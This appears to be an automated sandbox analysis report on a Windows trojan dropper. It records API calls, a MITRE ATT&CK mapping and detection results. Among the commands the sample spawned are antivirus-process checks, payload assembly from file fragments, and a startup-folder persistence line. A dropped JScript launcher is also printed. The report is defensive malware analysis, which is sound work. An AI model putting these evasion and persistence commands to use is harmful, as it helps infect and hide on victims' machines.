Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F133B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_11-100421)
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | API coverage: 4.9 %
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | API coverage: 4.7 %
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F54005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00F54005
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00F5494A
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F53CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00F53CE2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00F5C2FF
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00F5CD9F
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5CD14 FindFirstFileW,FindClose,11_2_00F5CD14
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00F5F5D8
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00F5F735
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00F5FA36
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DD4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00DD4005
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DD494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_00DD494A
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DDC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00DDC2FF
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DDCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_00DDCD9F
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DDCD14 FindFirstFileW,FindClose,17_2_00DDCD14
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DDF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00DDF5D8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DDF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00DDF735
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DDFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00DDFA36
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DD3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00DD3CE2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F05D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00F05D13
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\704579
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\704579\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, InnoMesh.scr, 00000011.00000002.4004946985.0000000003F60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F645D5 BlockInput,11_2_00F645D5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F05240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00F05240
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F25CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00F25CAC
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F488CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00F488CD
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F1A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00F1A385
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F1A354 SetUnhandledExceptionFilter,11_2_00F1A354
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00D9A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00D9A385
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00D9A354 SetUnhandledExceptionFilter,17_2_00D9A354
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F49369 LogonUserW,11_2_00F49369
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F05240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00F05240
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F51AC6 SendInput,keybd_event,11_2_00F51AC6
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F551E2 mouse_event,11_2_00F551E2
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 704579
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MARTNMSPIDERRINGTONE" Mh
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Organizational.pif u
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & echo url="c:\users\user\appdata\local\techmesh dynamics\innomesh.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & exit
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F488CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00F488CD
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F54F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00F54F1C
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029D2000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196672536.000000000427A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Organizational.pif, InnoMesh.scr | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F1885B cpuid 11_2_00F1885B
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F30030 GetLocalTime,__swprintf,11_2_00F30030
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F30722 GetUserNameW,11_2_00F30722
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F2416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00F2416A
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: InnoMesh.scr | Binary or memory string: WIN_81
Source: InnoMesh.scr | Binary or memory string: WIN_XP
Source: InnoMesh.scr | Binary or memory string: WIN_XPe
Source: InnoMesh.scr | Binary or memory string: WIN_VISTA
Source: InnoMesh.scr | Binary or memory string: WIN_7
Source: InnoMesh.scr | Binary or memory string: WIN_8
Source: InnoMesh.scr.11.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F6696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_00F6696E
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F66E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00F66E32
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DE696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,17_2_00DE696E
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DE6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,17_2_00DE6E32
MITRE ATT&CK matrix columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information11
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
11
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS17
System Information Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
111
Masquerading
LSA Secrets31
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials4
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Access Token Manipulation
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
Process Injection
Proc Filesystem1
System Owner/User Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Behavior Graph ID: 1577511, Sample: ldqj18tn.exe, Startdate: 18/12/2024, Architecture: WINDOWS, Score: 84
Start node signatures: Multi AV Scanner detection for submitted file; Sigma detected: Search for Antivirus process; Sigma detected: Drops script at startup location; 2 other signatures. DNS: zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq
  ldqj18tn.exe (started): dropped C:\Users\user\AppData\Local\Temp\Becoming (DOS), C:\Users\user\AppData\Local\Temp\Traveller (data), C:\Users\user\AppData\Local\Temp\Situations (data) and 13 other malicious files; signature: Writes many files with high entropy
    cmd.exe (started): dropped C:\Users\user\AppData\...\Organizational.pif (PE32); signatures: Drops PE files with a suspicious file extension, Writes many files with high entropy
      Organizational.pif (started): dropped C:\Users\user\AppData\Local\...\InnoMesh.scr (PE32), C:\Users\user\AppData\Local\...\M (data), C:\Users\user\AppData\Local\...\InnoMesh.js (ASCII); signatures: Drops PE files with a suspicious file extension, Writes many files with high entropy
        cmd.exe (started): dropped C:\Users\user\AppData\...\InnoMesh.url (MS)
          conhost.exe (started)
      cmd.exe (started): dropped C:\Users\user\AppData\Local\Temp\704579\u (data)
      conhost.exe (started)
      7 other processes (started)
  wscript.exe (started): signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    InnoMesh.scr (started)

Source | Detection | Scanner | Label | Link
ldqj18tn.exe | 66% | ReversingLabs | Win32.Trojan.Leonem
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | 8% | ReversingLabs
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | 8% | ReversingLabs
C:\Users\user\AppData\Local\Temp\Becoming | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq | unknown | unknown | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, InnoMesh.scr, 00000011.00000002.4002398623.0000000000E39000.00000002.00000001.01000000.00000008.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | ldqj18tn.exe | false | | high
https://www.autoitscript.com/autoit3/ | ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | false | | high
          No contacted IP infos
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1577511
          Start date and time:2024-12-18 14:50:05 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 9m 15s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:21
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:ldqj18tn.exe
          Detection:MAL
          Classification:mal84.rans.expl.evad.winEXE@28/26@2/0
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 103
          • Number of non-executed functions: 293
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • VT rate limit hit for: ldqj18tn.exe
Time | Type | Description
14:51:06 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url
          No context
          No context
          No context
          No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | EO3RT0fEfb.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | RMBOriPHVJ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | S6x3K8vzCA.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | PPbimZI4LV.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | l5VhEpwzJy.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | duyba.lnk.download.lnk | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | pt8GJiNZDT.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | EO3RT0fEfb.exe | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | RMBOriPHVJ.exe | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | S6x3K8vzCA.exe | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | PPbimZI4LV.exe | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | l5VhEpwzJy.exe | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | duyba.lnk.download.lnk | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | pt8GJiNZDT.exe | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | c2.hta | malicious | XWorm
                                              Process:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):177
                                              Entropy (8bit):4.652268392258587
                                              Encrypted:false
                                              SSDEEP:3:RiMIpGXIdPHo55wWAX+eLCMuL4EkD5xAaUFJl2FZo5uWAX+eLCMuL4EkD5xAaUFj:RiJBJHonwWDeLPqJkDvxUFT2FywWDeLu
                                              MD5:BE7A071668D410522BF92334A91B377C
                                              SHA1:5BEA960EE3C5A9765FB5C6B490B9EF5C26A4E229
                                              SHA-256:127FFBABF7B1F2B2DB1CD72BBC6BA5D1825A18751DF54F51B8807332BE4D6318
                                              SHA-512:E270C0A3CE26DFBDADAD3549B6C57422E6769ED20E3CF01E2502779EE618F8BBB39133423A4ABAD030768962FB0851BF6701534DE9A76B1CDBDE6483F3B0A9C3
                                              Malicious:true
                                              Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\TechMesh Dynamics\\InnoMesh.scr\" \"C:\\Users\\user\\AppData\\Local\\TechMesh Dynamics\\M\"")
                                              Process:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):893608
